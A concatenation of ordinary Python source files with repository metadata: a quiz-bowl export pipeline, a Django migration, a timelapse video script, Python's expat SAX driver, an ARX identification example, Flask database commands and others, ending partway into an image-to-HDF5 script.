6214c5175247107cbdd5b79f89585566c06f2081
|
/qanta/expo/pipeline.py
|
c17d494af85825359c52360392bcf96e870cc0e7
|
[
"MIT"
] |
permissive
|
IFarhankhan/qb
|
aedd4c2b6cb3413c6133ac4cc370516c5b9302d2
|
72ce2016e2ed68c7b999d0523b456b0dd1456c8f
|
refs/heads/master
| 2021-06-15T20:19:01.338830
| 2017-04-13T01:32:53
| 2017-04-13T01:32:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,532
|
py
|
import csv
import luigi
from luigi import LocalTarget, Task, ExternalTask, WrapperTask
from qanta.reporting.performance import load_data, load_audit
from qanta.datasets.quiz_bowl import QuestionDatabase
from qanta.preprocess import format_guess
from qanta.util.io import safe_path
from qanta.util.environment import QB_QUESTION_DB
from qanta.util.constants import (PRED_TARGET, META_TARGET, EXPO_BUZZ, EXPO_FINAL, VW_AUDIT,
EXPO_QUESTIONS)
def find_final(lines):
    """Return (sentence, token, guess) of the first buzzed line in *lines*.

    When no line buzzed, returns (-1, -1, <last line's guess>) as a fallback.
    """
    for entry in lines:
        if entry.buzz:
            return entry.sentence, entry.token, entry.guess
    return -1, -1, lines[-1].guess
class CreateTestQuestions(Task):
    """Luigi task: dump every test-fold question to CSV, one row per sentence."""
    def output(self):
        return LocalTarget(safe_path(EXPO_QUESTIONS))
    def run(self):
        db = QuestionDatabase(QB_QUESTION_DB)
        questions = db.all_questions()
        with open(safe_path(EXPO_QUESTIONS), 'w', newline='') as f:
            f.write('id,answer,sent,text\n')
            writer = csv.writer(f, delimiter=',')
            for q in questions.values():
                if q.fold != 'test':
                    continue
                # q.text maps sentence index -> sentence; emit one CSV row
                # per sentence index from 0 through the highest present.
                max_sent = max(q.text.keys())
                for i in range(max_sent + 1):
                    writer.writerow([q.qnum, format_guess(q.page), i, q.text[i]])
class Prerequisites(ExternalTask):
    """External dependency: the prediction and meta files for *fold* must already exist."""
    fold = luigi.Parameter()
    def output(self):
        return [LocalTarget(PRED_TARGET.format(self.fold)),
                LocalTarget(META_TARGET.format(self.fold))]
class GenerateExpo(Task):
    """Luigi task: build the expo buzz CSV and final-answer CSV for *fold*."""
    fold = luigi.Parameter()
    def requires(self):
        yield Prerequisites(fold=self.fold)
    def output(self):
        return [LocalTarget(EXPO_BUZZ.format(self.fold)),
                LocalTarget(EXPO_FINAL.format(self.fold))]
    def run(self):
        db = QuestionDatabase(QB_QUESTION_DB)
        data = load_data(PRED_TARGET.format(self.fold),
                         META_TARGET.format(self.fold), db)
        audit_data = load_audit(VW_AUDIT.format(self.fold), META_TARGET.format(self.fold))
        buzz_file = open(safe_path(EXPO_BUZZ.format(self.fold)), 'w', newline='')
        buzz_file.write('question,sentence,word,page,evidence,final,weight\n')
        buzz_writer = csv.writer(buzz_file, delimiter=',')
        final_file = open(safe_path(EXPO_FINAL.format(self.fold)), 'w', newline='')
        final_file.write('question,answer\n')
        final_writer = csv.writer(final_file, delimiter=',')
        for qnum, lines in data:
            final_sentence, final_token, final_guess = find_final(lines)
            # No buzz anywhere in the question: record the last guess as final.
            if final_sentence == -1 and final_token == -1:
                final_writer.writerow([qnum, final_guess])
            for l in lines:
                i = 0
                is_final = False
                if l.sentence == final_sentence and l.token == final_token:
                    final_writer.writerow([qnum, l.guess])
                    is_final = True
                # Emit at most five guesses per (sentence, token) position.
                for g in l.all_guesses:
                    evidence = audit_data[(l.question, l.sentence, l.token, g.guess)]
                    buzz_writer.writerow([
                        l.question, l.sentence, l.token, g.guess, evidence,
                        int(is_final and g.guess == l.guess), g.score
                    ])
                    i += 1
                    if i > 4:
                        break
        buzz_file.close()
        final_file.close()
class AllExpo(WrapperTask):
    """Top-level wrapper: build both expo outputs for the test fold."""
    def requires(self):
        yield GenerateExpo(fold='test')
        yield CreateTestQuestions()
|
[
"ski.rodriguez@gmail.com"
] |
ski.rodriguez@gmail.com
|
cda5c04bfa981680632afe5e9defebb88adf8ca5
|
4ff54f6cd44e7b2beba39e74dad589083687b93b
|
/blogproject parts7/blog/migrations/0008_post_uploaded_at.py
|
b255a5bfac9636c5318209564caef206c0e325e6
|
[] |
no_license
|
jaganmohangg/kokokoko
|
200a2d1bc5726f0777407c8f527eec930013160b
|
70d5c91417911069da8cc8d42f26b62a1656aba9
|
refs/heads/master
| 2020-06-02T02:24:21.105744
| 2019-06-09T12:46:10
| 2019-06-09T12:46:10
| 191,005,165
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 550
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-06-08 05:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Add an `uploaded_at` timestamp (auto-set on insert) to blog.Post."""
    dependencies = [
        ('blog', '0007_post_document'),
    ]
    operations = [
        migrations.AddField(
            model_name='post',
            name='uploaded_at',
            # auto_now_add fills new rows; the one-off `default` backfills
            # existing rows, and preserve_default=False drops it afterwards.
            field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
            preserve_default=False,
        ),
    ]
|
[
"gavvala.jagan@gmail.com"
] |
gavvala.jagan@gmail.com
|
f74baf4cce632b72f3475d46364caf95e9ed4cca
|
bf1b398b2318a1db7654eb2fc923ccaf63b6ce87
|
/create_video.py
|
a7363caf3155f5e2ed021da96171aafdb1ee9228
|
[] |
no_license
|
Maddix/Pylapse
|
9c119a384a87c3da5b6d8dde63281e65d275cf08
|
d1a2819333a447b4f642f2b4b8529f8b0b2130f1
|
refs/heads/master
| 2021-01-10T17:00:45.038549
| 2015-10-24T22:46:28
| 2015-10-24T22:46:28
| 44,137,581
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,902
|
py
|
#! usr/bin/python3
# Maddix - Oct 2015 - Python 3.4
# NOTE: Not tested. Remove when it is.
"""
The MIT License (MIT)
Copyright (c) 2015 Maddix
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import os
import src.utils as utils
# TODO: Logging
def pick(folders):
    """Interactively prompt until the user chooses one of *folders*; return it.

    Raises Exception when the user types 'quit' (or "'quit'").
    """
    print("Pick a folder or enter 'quit' to quit. Enter a positive number.")
    for number, name in enumerate(folders, start=1):
        print("[{0}] {1}".format(number, name))
    while True:
        answer = input(">> ")
        if answer in ("quit", "'quit'"):
            raise Exception("Bye!")
        if not answer.isnumeric():
            print("Positive numbers only.")
            continue
        index = int(answer) - 1
        if 0 <= index < len(folders):
            return folders[index]
        print("Please pick a number form 1 to {0}.".format(len(folders)))
if __name__ == "__main__":
print("Loading Config.json..")
config = utils.Handle_json("config.json", "src", [("ffmpeg-command", list)])
print("Done.\nLocating ffmpeg.exe..")
if not utils.check_for_ffmpeg(config):
raise Exception("Could not find ffmpeg.exe!")
print("Done.\nLoading video folder..")
config.check_required([
("folder-options", dict),
("folder-options.source", list),
("folder-options.destination", list),
("folder-options.image-folder-name", str),
("folder-options.video-folder-name", str),
("options", dict),
("options.image-number-total-pad", int),
("options.image-type", str),
("ffmpeg-command", list)
])
destination = os.path.join(*config.get("folder-options.destination"))
folders = os.listdir(destination)
working_folder = os.path.join(destination, pick(folders))
image_folder = os.path.join(destination, working_folder, config.get("folder-options.image-folder-name"))
video_folder = os.path.join(destination, working_folder, config.get("folder-options.video-folder-name"))
print("Done.\nCreating video..")
utils.Create_video(config, image_folder, video_folder)
print("Done.")
|
[
"starcraftd@gmail.com"
] |
starcraftd@gmail.com
|
f67035568dbbe0c11da1ca0f816a4be0f0dcfe27
|
35b77f2f50a64f8af7ae3b6ba2c9c7bae66eed43
|
/learnml/supervised/api.py
|
a64229c7793c8deaf578def9523cb09593074b25
|
[
"MIT"
] |
permissive
|
Rost381/learnml
|
9dbbac1f2ca238dda696299bcc87886eb178d7dc
|
2622cd2b9caf0cd00f6aac62f921cd1838ef5807
|
refs/heads/master
| 2022-02-27T01:25:29.285925
| 2019-10-14T18:28:55
| 2019-10-14T18:28:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 781
|
py
|
from .adaboost import AdaBoostClassifier
from .decision_tree import (ClassificationTree, RegressionTree,
XGBoostRegressionTree)
from .gradient_boosting import (GradientBoostingClassifier,
GradientBoostingRegressor)
from .k_nearest_neighbors import KNeighborsClassifier
from .linear_discriminant_analysis import LinearDiscriminantAnalysis
from .logistic_regression import LogisticRegression
from .naive_bayes import GaussianNB
from .perceptron import Perceptron
from .random_forest import RandomForestClassifier
from .regression import (LassoRegression, LinearRegression,
PolynomialRidgeRegression, RidgeRegression, ElasticNet)
from .support_vector_machine import svm
from .xgboost import XGBoost
|
[
"4571766+ByrainZhi@users.noreply.github.com"
] |
4571766+ByrainZhi@users.noreply.github.com
|
793c1d14191e4458ecb4d6bf7826224b4cc77b93
|
2ff7e53d5e512cd762217ca54317982e07a2bb0c
|
/xml/sax/expatreader.py
|
0907be74460830fd1afb203b1e7a14cbe9ed3983
|
[] |
no_license
|
nanxijw/Clara-Pretty-One-Dick
|
66d3d69426642b79e8fd4cc8e0bec23adeeca6d6
|
50de3488a2140343c364efc2615cf6e67f152be0
|
refs/heads/master
| 2021-01-19T09:25:07.555284
| 2015-02-17T21:49:33
| 2015-02-17T21:49:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,563
|
py
|
#Embedded file name: xml/sax\expatreader.py
"""
SAX driver for the pyexpat C module. This driver works with
pyexpat.__version__ == '2.22'.
"""
version = '0.20'
from xml.sax._exceptions import *
from xml.sax.handler import feature_validation, feature_namespaces
from xml.sax.handler import feature_namespace_prefixes
from xml.sax.handler import feature_external_ges, feature_external_pes
from xml.sax.handler import feature_string_interning
from xml.sax.handler import property_xml_string, property_interning_dict
import sys
if sys.platform[:4] == 'java':
raise SAXReaderNotAvailable('expat not available in Java', None)
del sys
try:
from xml.parsers import expat
except ImportError:
raise SAXReaderNotAvailable('expat not supported', None)
else:
if not hasattr(expat, 'ParserCreate'):
raise SAXReaderNotAvailable('expat not supported', None)
from xml.sax import xmlreader, saxutils, handler
AttributesImpl = xmlreader.AttributesImpl
AttributesNSImpl = xmlreader.AttributesNSImpl
try:
import _weakref
except ImportError:
def _mkproxy(o):
return o
else:
import weakref
_mkproxy = weakref.proxy
del weakref
del _weakref
class ExpatLocator(xmlreader.Locator):
    """Locator for use with the ExpatParser class.

    Holds only a weak proxy to the parser, avoiding a reference cycle
    between the parser and the content handler.
    """
    def __init__(self, parser):
        self._ref = _mkproxy(parser)

    def getColumnNumber(self):
        owner = self._ref
        if owner._parser is None:
            return None
        return owner._parser.ErrorColumnNumber

    def getLineNumber(self):
        owner = self._ref
        if owner._parser is None:
            return 1
        return owner._parser.ErrorLineNumber

    def getPublicId(self):
        owner = self._ref
        if owner is None:
            return None
        return owner._source.getPublicId()

    def getSystemId(self):
        owner = self._ref
        if owner is None:
            return None
        return owner._source.getSystemId()
class ExpatParser(xmlreader.IncrementalParser, xmlreader.Locator):
"""SAX driver for the pyexpat C module."""
def __init__(self, namespaceHandling = 0, bufsize = 65516):
xmlreader.IncrementalParser.__init__(self, bufsize)
self._source = xmlreader.InputSource()
self._parser = None
self._namespaces = namespaceHandling
self._lex_handler_prop = None
self._parsing = 0
self._entity_stack = []
self._external_ges = 1
self._interning = None
def parse(self, source):
"""Parse an XML document from a URL or an InputSource."""
source = saxutils.prepare_input_source(source)
self._source = source
self.reset()
self._cont_handler.setDocumentLocator(ExpatLocator(self))
xmlreader.IncrementalParser.parse(self, source)
def prepareParser(self, source):
if source.getSystemId() is not None:
self._parser.SetBase(source.getSystemId())
def setContentHandler(self, handler):
xmlreader.IncrementalParser.setContentHandler(self, handler)
if self._parsing:
self._reset_cont_handler()
def getFeature(self, name):
if name == feature_namespaces:
return self._namespaces
if name == feature_string_interning:
return self._interning is not None
if name in (feature_validation, feature_external_pes, feature_namespace_prefixes):
return 0
if name == feature_external_ges:
return self._external_ges
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def setFeature(self, name, state):
if self._parsing:
raise SAXNotSupportedException('Cannot set features while parsing')
if name == feature_namespaces:
self._namespaces = state
elif name == feature_external_ges:
self._external_ges = state
elif name == feature_string_interning:
if state:
if self._interning is None:
self._interning = {}
else:
self._interning = None
elif name == feature_validation:
if state:
raise SAXNotSupportedException('expat does not support validation')
elif name == feature_external_pes:
if state:
raise SAXNotSupportedException('expat does not read external parameter entities')
elif name == feature_namespace_prefixes:
if state:
raise SAXNotSupportedException('expat does not report namespace prefixes')
else:
raise SAXNotRecognizedException("Feature '%s' not recognized" % name)
def getProperty(self, name):
if name == handler.property_lexical_handler:
return self._lex_handler_prop
if name == property_interning_dict:
return self._interning
if name == property_xml_string:
if self._parser:
if hasattr(self._parser, 'GetInputContext'):
return self._parser.GetInputContext()
raise SAXNotRecognizedException('This version of expat does not support getting the XML string')
else:
raise SAXNotSupportedException('XML string cannot be returned when not parsing')
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
def setProperty(self, name, value):
if name == handler.property_lexical_handler:
self._lex_handler_prop = value
if self._parsing:
self._reset_lex_handler_prop()
elif name == property_interning_dict:
self._interning = value
elif name == property_xml_string:
raise SAXNotSupportedException("Property '%s' cannot be set" % name)
else:
raise SAXNotRecognizedException("Property '%s' not recognized" % name)
def feed(self, data, isFinal = 0):
if not self._parsing:
self.reset()
self._parsing = 1
self._cont_handler.startDocument()
try:
self._parser.Parse(data, isFinal)
except expat.error as e:
exc = SAXParseException(expat.ErrorString(e.code), e, self)
self._err_handler.fatalError(exc)
def close(self):
if self._entity_stack:
return
self.feed('', isFinal=1)
self._cont_handler.endDocument()
self._parsing = 0
self._parser = None
def _reset_cont_handler(self):
self._parser.ProcessingInstructionHandler = self._cont_handler.processingInstruction
self._parser.CharacterDataHandler = self._cont_handler.characters
def _reset_lex_handler_prop(self):
lex = self._lex_handler_prop
parser = self._parser
if lex is None:
parser.CommentHandler = None
parser.StartCdataSectionHandler = None
parser.EndCdataSectionHandler = None
parser.StartDoctypeDeclHandler = None
parser.EndDoctypeDeclHandler = None
else:
parser.CommentHandler = lex.comment
parser.StartCdataSectionHandler = lex.startCDATA
parser.EndCdataSectionHandler = lex.endCDATA
parser.StartDoctypeDeclHandler = self.start_doctype_decl
parser.EndDoctypeDeclHandler = lex.endDTD
def reset(self):
if self._namespaces:
self._parser = expat.ParserCreate(self._source.getEncoding(), ' ', intern=self._interning)
self._parser.namespace_prefixes = 1
self._parser.StartElementHandler = self.start_element_ns
self._parser.EndElementHandler = self.end_element_ns
else:
self._parser = expat.ParserCreate(self._source.getEncoding(), intern=self._interning)
self._parser.StartElementHandler = self.start_element
self._parser.EndElementHandler = self.end_element
self._reset_cont_handler()
self._parser.UnparsedEntityDeclHandler = self.unparsed_entity_decl
self._parser.NotationDeclHandler = self.notation_decl
self._parser.StartNamespaceDeclHandler = self.start_namespace_decl
self._parser.EndNamespaceDeclHandler = self.end_namespace_decl
self._decl_handler_prop = None
if self._lex_handler_prop:
self._reset_lex_handler_prop()
self._parser.ExternalEntityRefHandler = self.external_entity_ref
try:
self._parser.SkippedEntityHandler = self.skipped_entity_handler
except AttributeError:
pass
self._parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_UNLESS_STANDALONE)
self._parsing = 0
self._entity_stack = []
def getColumnNumber(self):
if self._parser is None:
return
return self._parser.ErrorColumnNumber
def getLineNumber(self):
if self._parser is None:
return 1
return self._parser.ErrorLineNumber
def getPublicId(self):
return self._source.getPublicId()
def getSystemId(self):
return self._source.getSystemId()
def start_element(self, name, attrs):
self._cont_handler.startElement(name, AttributesImpl(attrs))
def end_element(self, name):
self._cont_handler.endElement(name)
def start_element_ns(self, name, attrs):
pair = name.split()
if len(pair) == 1:
pair = (None, name)
elif len(pair) == 3:
pair = (pair[0], pair[1])
else:
pair = tuple(pair)
newattrs = {}
qnames = {}
for aname, value in attrs.items():
parts = aname.split()
length = len(parts)
if length == 1:
qname = aname
apair = (None, aname)
elif length == 3:
qname = '%s:%s' % (parts[2], parts[1])
apair = (parts[0], parts[1])
else:
qname = parts[1]
apair = tuple(parts)
newattrs[apair] = value
qnames[apair] = qname
self._cont_handler.startElementNS(pair, None, AttributesNSImpl(newattrs, qnames))
def end_element_ns(self, name):
pair = name.split()
if len(pair) == 1:
pair = (None, name)
elif len(pair) == 3:
pair = (pair[0], pair[1])
else:
pair = tuple(pair)
self._cont_handler.endElementNS(pair, None)
def processing_instruction(self, target, data):
self._cont_handler.processingInstruction(target, data)
def character_data(self, data):
self._cont_handler.characters(data)
def start_namespace_decl(self, prefix, uri):
    # Map expat's namespace-declaration event onto SAX prefix mapping.
    self._cont_handler.startPrefixMapping(prefix, uri)
def end_namespace_decl(self, prefix):
    # End of a namespace scope; URI is not needed by SAX here.
    self._cont_handler.endPrefixMapping(prefix)
def start_doctype_decl(self, name, sysid, pubid, has_internal_subset):
    # Note the argument reorder (pubid before sysid) and that
    # has_internal_subset is dropped: startDTD takes (name, publicId, systemId).
    self._lex_handler_prop.startDTD(name, pubid, sysid)
def unparsed_entity_decl(self, name, base, sysid, pubid, notation_name):
    # `base` is ignored; arguments reordered to SAX's
    # (name, publicId, systemId, notationName).
    self._dtd_handler.unparsedEntityDecl(name, pubid, sysid, notation_name)
def notation_decl(self, name, base, sysid, pubid):
    # `base` is ignored; arguments reordered to SAX's (name, publicId, systemId).
    self._dtd_handler.notationDecl(name, pubid, sysid)
def external_entity_ref(self, context, base, sysid, pubid):
    """Parse an external general entity with a sub-parser.

    Returns 1 (expat "handled") on success or when external entities are
    disabled, 0 on any parse failure.
    """
    if not self._external_ges:
        # External general entities disabled: report success without expanding.
        return 1
    source = self._ent_handler.resolveEntity(pubid, sysid)
    source = saxutils.prepare_input_source(source, self._source.getSystemId() or '')
    # Save current parser/source; expat requires a dedicated sub-parser
    # created from the entity's context.
    self._entity_stack.append((self._parser, self._source))
    self._parser = self._parser.ExternalEntityParserCreate(context)
    self._source = source
    try:
        xmlreader.IncrementalParser.parse(self, source)
    except:
        # NOTE(review): bare except maps *any* error (including
        # KeyboardInterrupt) to expat failure; kept as-is for compatibility.
        return 0
    # Restore the outer parser state.
    self._parser, self._source = self._entity_stack[-1]
    del self._entity_stack[-1]
    return 1
def skipped_entity_handler(self, name, is_pe):
    # Parameter entities are reported with a '%' prefix to distinguish
    # them from general entities.
    if is_pe:
        name = '%' + name
    self._cont_handler.skippedEntity(name)
def create_parser(*args, **kwargs):
    """Module-level factory: return a new ExpatParser (SAX entry point)."""
    return ExpatParser(*args, **kwargs)
if __name__ == '__main__':
    # Smoke test: echo a remote XML document through an XMLGenerator.
    # NOTE(review): fetches over HTTP, so this requires network access.
    import xml.sax.saxutils
    p = create_parser()
    p.setContentHandler(xml.sax.saxutils.XMLGenerator())
    p.setErrorHandler(xml.sax.ErrorHandler())
    p.parse('http://www.ibiblio.org/xml/examples/shakespeare/hamlet.xml')
|
[
"billchang.e@gmail.com"
] |
billchang.e@gmail.com
|
a4bc62260d98fa21619b0221d52ce92634f76ec3
|
a65e5dc54092a318fc469543c3b96f6699d0c60b
|
/Personel/Ruthwik/Python/4mar/prime_check.py
|
6b605513ebd7ca83f57d7ca66e8560309982ba03
|
[] |
no_license
|
shankar7791/MI-10-DevOps
|
e15bfda460ffd0afce63274f2f430445d04261fe
|
f0b9e8c5be7b28298eb6d3fb6badf11cd033881d
|
refs/heads/main
| 2023-07-04T15:25:08.673757
| 2021-08-12T09:12:37
| 2021-08-12T09:12:37
| 339,016,230
| 1
| 0
| null | 2021-08-12T09:12:37
| 2021-02-15T08:50:08
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 542
|
py
|
#Python function that takes a number as a parameter and check the number is prime or not.
def isPrime(n):
    """Return True if n is prime, False otherwise (trial division, 6k±1)."""
    # Primes are >= 2; dispose of small and negative inputs first.
    if n < 2:
        return False
    if n in (2, 3):
        return True
    if n % 2 == 0 or n % 3 == 0:
        return False
    # Every prime > 3 has the form 6k ± 1; test those candidates up to sqrt(n).
    divisor = 5
    while divisor * divisor <= n:
        if n % divisor == 0 or n % (divisor + 2) == 0:
            return False
        divisor += 6
    return True
# CLI driver: read one integer from stdin and report whether it is prime.
n1=int(input("Enter a number : "))
if (isPrime(n1)) :
    print("It is a prime number ")
else :
    print("It is not a prime number")
|
[
"ruthwikraja@gmail.com"
] |
ruthwikraja@gmail.com
|
fbb35df666161f55624d3f6f2b173de3ab78aca0
|
6b185446d3ae1500e7b5b2a6174cc49c455af33d
|
/category.py
|
4bb0a4ab7507dbe32ae53503ef7775e0f29b8a43
|
[] |
no_license
|
xiangbohua/python_spider
|
27d7cc535988751e418530d5681fef044275f4e4
|
9d401a46a44f38e76391597ddf2d5f723108f308
|
refs/heads/master
| 2020-03-19T19:31:38.607195
| 2018-06-11T02:37:35
| 2018-06-11T02:37:35
| 136,860,925
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 267
|
py
|
#!/usr/local/bin/python3
# -*- coding: utf8 -*-
from dbObject import DbObject
class Category(DbObject):
    """Persisted record for a crawled category, backed by DbObject."""

    def getFields(self):
        # Column names stored for each category row.
        return ['mark','c_name','c_url','level','parent_name','c_index','processed']

    def getRuntimeProp(self):
        # This model has no runtime-only properties.
        return []
|
[
"xiangbohua@hotmail.com"
] |
xiangbohua@hotmail.com
|
1cc18b9cc6e643592b97461aa5192b57443538ce
|
a0d265fdd4d530f39053cd58b2c885f7ec3f7776
|
/examples/arx_identifier.py
|
2297c10df668fd86dca097d4b7f4f856955e1e0c
|
[] |
no_license
|
el-hult/lava
|
c062062db0004190b7d2b188871034e0d9719921
|
1419e0946d122449ccc8c4798251aa582b87ef20
|
refs/heads/master
| 2020-05-15T02:12:25.240511
| 2019-09-23T12:39:39
| 2019-09-23T12:39:39
| 182,044,821
| 0
| 0
| null | 2019-04-18T08:08:13
| 2019-04-18T08:08:12
| null |
UTF-8
|
Python
| false
| false
| 3,539
|
py
|
"""
System identification with ARX model
------------------------------------
Makes regression of a AR system.
Shows that by letting the AR components be in the Latent Regressor Model, correct order is identified.
Runs twice - once with a Nominal model, and once with a Latent Model.
Showcases that the LAVA algorithm penalizes the irrelevant regressor coefficients.
"""
# Standard library imports
import math
# 3rd party imports
import numpy as np
import matplotlib.pyplot as plt
# local imports
import lava.core as lava
# Setup
np.random.seed(0)  # fixed seed so the example is reproducible
# Options
A = np.array([[.95, .2],
              [-.2, .95]])  # state transition matrix (stable rotation-like system)
B = np.array([[.3, 0],
              [0, 0.1]])  # input gain matrix
N = 400        # total number of samples
ar_order = 4   # lags given to the ARX regressor (intentionally over-parametrized)
# generate data
N_fit = int(math.ceil(N / 2))
N_test = N - N_fit
U = np.random.normal(0, 1, size=(2, N))
X = np.zeros((2, N))
X[:, 0:2] = np.array([[2, -2], [2, -2]]).T  # non-zero initial conditions
measurement_noise = np.random.normal(0, .2, X.shape)
# Two-step recurrence: the state at t+2 depends on the state at t and the
# input at t+1, so the true system order is 2 (less than ar_order).
for t in range(N - 2):
    X[:, t + 2] = A @ X[:, t] + B @ U[:, t + 1]
Y = X + measurement_noise
# train lava model and plot results
# do this twice - once with ARX overparametrized as latent, and once as nominal model
for k in [0, 1]:
    arx_regressor = lava.ARXRegressor(y_lag_max=ar_order, u_lag_max=ar_order)
    intercept_regressor = lava.InterceptRegressor()
    if k == 0:
        # k == 0: ARX in the latent model, intercept as nominal.
        lb = lava.Lava(nominal_model=intercept_regressor, latent_model=arx_regressor)
    else:
        # k == 1: ARX as nominal, intercept latent.
        lb = lava.Lava(nominal_model=arx_regressor, latent_model=intercept_regressor)
    # Fit recursively on the first half of the data, one sample at a time.
    for t in range(N_fit):
        lb.step(y=Y[:, t], u=U[:, t], n_recursive_rounds=30)
    # predict with lava model
    Y_hat, _, _ = lb.simulate(u=U[:, N_fit:N_fit + N_test])
    # plot results
    t_all = np.arange(0, N)
    t_pred = np.arange(N_test, N)
    plt.subplot(2, 1, 1)
    plt.plot(t_all, X[0, :])
    plt.plot(t_pred, Y_hat[0, 0:N_test], ":")
    plt.legend(["y", "y_hat"])
    plt.subplot(2, 1, 2)
    plt.plot(t_all, X[1, :])
    plt.plot(t_pred, Y_hat[1, 0:N_test], ":")
    plt.legend(["y", "y_hat"])
    plt.suptitle(
        f"Predictions, using {lb.nominal_model.__class__.__name__} as nominal, "
        f"and {lb.latent_model.__class__.__name__} as latent", fontsize=10)
    plt.show()
    plt.figure()
    # When ARX is the nominal model (k == 1) its coefficients live in lb.Theta,
    # otherwise they are in the latent matrix lb.Z.
    ar_matrix = lb.Theta if k == 1 else lb.Z
    affects_names = ['y0', 'y1']
    affecting_names_y = [f"{p} Lag{l}" for l in range(1, ar_order + 1) for p in affects_names]
    affecting_names_u = [f"{p} Lag{l}" for l in range(1, ar_order + 1) for p in ['u0', 'u1']]
    affecting_names = [*affecting_names_y, *affecting_names_u, 'Intercept']
    fig = plt.figure()
    ax = plt.gca()
    im = plt.imshow(ar_matrix)
    # We want to show all ticks...
    ax.set_yticks(np.arange(len(affects_names)))
    ax.set_xticks(np.arange(len(affecting_names)))
    # ... and label them with the respective list entries
    ax.set_yticklabels(affects_names)
    ax.set_xticklabels(affecting_names)
    # Rotate the tick labels and set their alignment.
    plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
             rotation_mode="anchor")
    # Loop over data dimensions and create text annotations.
    for i in range(len(affects_names)):
        for j in range(len(affecting_names)):
            text = ax.text(j, i, ar_matrix[i, j].round(2),
                           ha="center", va="center", color="w")
    ax.set_title(
        f"AR-matrices, using {lb.nominal_model.__class__.__name__} as nominal, and"
        f" {lb.latent_model.__class__.__name__} as latent", fontsize=10)
    fig.tight_layout()
    plt.show()
|
[
"ludvig.hult@gmail.com"
] |
ludvig.hult@gmail.com
|
744320eb29d18c77fb9713727ff7d58839e221a1
|
5bcf871c70207c8800caaef55f98b260af94ad14
|
/src/commands.py
|
23ae00d8787c99267006aca573a031db69147ff0
|
[] |
no_license
|
petelah/Flask-Rest-CC
|
72dc391e7f1bf7531146cf79c0b4c1d69a193c41
|
eac303a66578f7941156b537ddccb03f5585a6ee
|
refs/heads/main
| 2023-03-19T04:57:40.381047
| 2021-03-09T00:33:41
| 2021-03-09T00:33:41
| 345,835,084
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,180
|
py
|
from flask import Blueprint, current_app
from src import db
# Blueprint carrying the custom `flask db-custom ...` CLI commands.
db_commands = Blueprint("db-custom", __name__)

@db_commands.cli.command("create")
def create_db():
    """CLI command: create all tables for the registered models."""
    db.create_all()
    print("DB Created")
@db_commands.cli.command("drop")
def drop_db():
    """CLI command: drop all model tables plus Alembic's version table."""
    db.drop_all()
    # drop_all() does not know about Alembic's bookkeeping table; drop it too.
    db.engine.execute("DROP TABLE IF EXISTS alembic_version;")
    print("Tables deleted")
@db_commands.cli.command("seed")
def seed_db():
    """CLI command: seed the users table with five deterministic test accounts.

    Requires TEST_PASSWORD in the app config; raises ValueError if missing.
    Every seeded user shares the same password.
    """
    from src.models.User import User
    from src import bcrypt
    from faker import Faker
    faker = Faker()
    TEST_PASSWORD = current_app.config["TEST_PASSWORD"]
    if not TEST_PASSWORD:
        raise ValueError('TEST_PASSWORD not provided.')
    # bcrypt hashing is intentionally slow; hash the shared password once
    # instead of once per user (was recomputed inside the loop).
    password_hash = bcrypt.generate_password_hash(f"{TEST_PASSWORD}").decode("utf-8")
    for i in range(5):
        # Add users
        user = User()
        user.email = f"test{i}@test.com"
        user.bio = faker.paragraph(nb_sentences=3)
        user.username = f"test{i}"
        user.first_name = faker.first_name()
        user.last_name = faker.last_name()
        user.password = password_hash
        db.session.add(user)
        print("Users Added")
    # Single commit for the whole batch.
    db.session.commit()
    print("Tables seeded")
|
[
"seabrook.peter@gmail.com"
] |
seabrook.peter@gmail.com
|
aa6d4d82fe1ced7946042ccc6d540cad9075da16
|
216d96ff265457e2ca32e93bd88b9ee437154a52
|
/grasp/src/image2hdf5_v1.py
|
cf51a4f42010540dd2746b15d30128d9ec8e9f76
|
[] |
no_license
|
austin2408/Grasp_drl
|
b752029bd60f7c1a7654df64517439a050df26d4
|
26f9c20503e3e7a3da4462e03fb634ce0a2c55f4
|
refs/heads/main
| 2023-09-03T21:32:27.322133
| 2021-11-05T05:32:29
| 2021-11-05T05:32:29
| 380,958,346
| 0
| 1
| null | 2021-11-05T05:32:30
| 2021-06-28T08:21:31
|
Python
|
UTF-8
|
Python
| false
| false
| 5,994
|
py
|
from ast import iter_child_nodes
import h5py
import cv2
import numpy as np
import matplotlib.pyplot as plt
import os
import math
import random
import json
import warnings
warnings.filterwarnings("ignore")
Path = '/home/austin/DataSet/grasp_drl/datasets'  # root folder of recorded episodes
ratio = 1       # probability of also writing the fail transition of an episode
count = [0,0]   # running totals: [success transitions, fail transitions] written
